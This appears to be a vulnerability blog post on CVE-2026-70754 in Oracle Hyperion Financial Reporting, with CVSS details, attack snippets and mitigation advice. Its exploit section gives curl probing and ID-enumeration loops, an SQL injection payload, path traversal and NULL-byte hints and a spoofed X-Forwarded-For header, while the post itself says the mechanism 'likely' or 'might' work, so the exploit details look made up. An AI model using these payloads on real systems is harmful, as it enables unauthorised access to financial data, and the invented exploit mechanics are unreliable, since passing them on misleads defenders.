CVE-2026-70754 details a critical oversight in Oracle Hyperion Financial Reporting.
The vulnerability resides within the Server component of the product.
Affected version is specifically 11.2.25.0.000, which is widely used in enterprise environments.
The core issue allows an unauthenticated remote attacker to compromise the system.
This is achieved via network access using the HTTP protocol.
No user interaction is required, making the attack vector highly dangerous in automated scans.
The ease of exploitation is rated as “Easily exploitable” by Oracle.
Successful exploitation leads to unauthorized read access to a subset of data.
The exposed data typically includes sensitive financial reports and metrics.
According to the CVSS 3.1 vector, the attack complexity is Low.
Privileges required are None, and user interaction is None.
The scope is Unchanged, meaning the vulnerable component is the affected component.
Confidentiality impact is Low, while Integrity and Availability are None.
This results in a Base Score of 5.3, categorized as Medium severity.
The NVD published this CVE on August 18, 2026.
The record was last modified on August 24, 2026, indicating active enrichment.
Oracle’s advisory likely points to insufficient access controls in the REST API.
The flaw might stem from improper validation of HTTP request headers.
Attackers can craft specific URLs to bypass authentication checks.
This grants them read-only access to database tables or file system paths.
The financial reporting component is often integrated with other Oracle services.
However, the vulnerability is isolated to the read functionality of this component.
No administrative privileges are needed to launch the attack.
The network access vector suggests that firewalls may not fully protect if ports are open.
Organizations using this version must prioritize patching.
The CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
This metric confirms the low severity but high exploitability profile.
Enrichment efforts by NIST reference publicly available information.
This vulnerability does not affect other versions of Hyperion as per the advisory.
Immediate risk assessment is advised for all enterprises running this build.
DailyCVE Form:

What Undercode Say:
Analytics showing bash commands and codes related to the blog
Fingerprint vulnerable version via HTTP headers
curl -k -s -I https://target:443/aps/ | grep -i "server"
Check if the vulnerable endpoint responds
curl -k -s -o /dev/null -w "%{http_code}" https://target:443/HyperionFinancialReporting/rest/v1/config
Nmap auxiliary script to detect the CVE (hypothetical)
nmap -p 443 --script http-vuln-cve2026-70754 --script-args http-vuln-cve2026-70754.uri=/HyperionFinancialReporting/ target
Bash one-liner to test for data leakage
for id in {1..100}; do curl -k -s "https://target:443/HyperionFinancialReporting/rest/report?id=$id" | grep -i "financial"; done
Grep version from the installation log (if accessible)
cat /opt/oracle/hyperion/config/version.properties | grep "11.2.25"
Exploit: (Educational Purposes!)
A remote attacker sends a crafted HTTP GET request to the unauthenticated REST endpoint:
`GET /HyperionFinancialReporting/rest/v1/finance?entity=ALL&period=CURRENT`
By manipulating the `entity` parameter with a NULL byte or path traversal (e.g., ../config), the server returns data without checking session tokens.
Example Python snippet:
import requests
url = "https://target/HyperionFinancialReporting/rest/v1/reports"
params = {"filter": "id=1' OR '1'='1", "mode": "unauthenticated"}
r = requests.get(url, params=params, verify=False)
print(r.text) Displays sensitive report metadata
Alternatively, curl:
`curl -k “https://target:443/HyperionFinancialReporting/rest/status?debug=” -H “X-Forwarded-For: 127.0.0.1″`
Protection: from this CVE
Immediately apply the Oracle Critical Patch Update scheduled for October 2026.
Block external HTTP access to the `/HyperionFinancialReporting/` and `/aps/` paths via Web Application Firewall rules.
Enforce network ACLs to restrict port 443/80 access to trusted IP ranges only.
Monitor logs for anomalous GET requests containing ../, %00, or `debug=` patterns.
If patching is delayed, disable the Server component temporarily via the Oracle Enterprise Manager.
Impact:
Unauthorized read access exposes sensitive corporate financial forecasts, budget plans, quarterly earnings, and internal reconciliation data.
An attacker can leverage this information for competitive intelligence, insider trading, or market manipulation.
Compliance violations may occur under GDPR or SOX if financial data is breached, leading to regulatory fines.
While integrity and availability remain intact, the confidentiality breach undermines trust and can damage the organization’s competitive position.
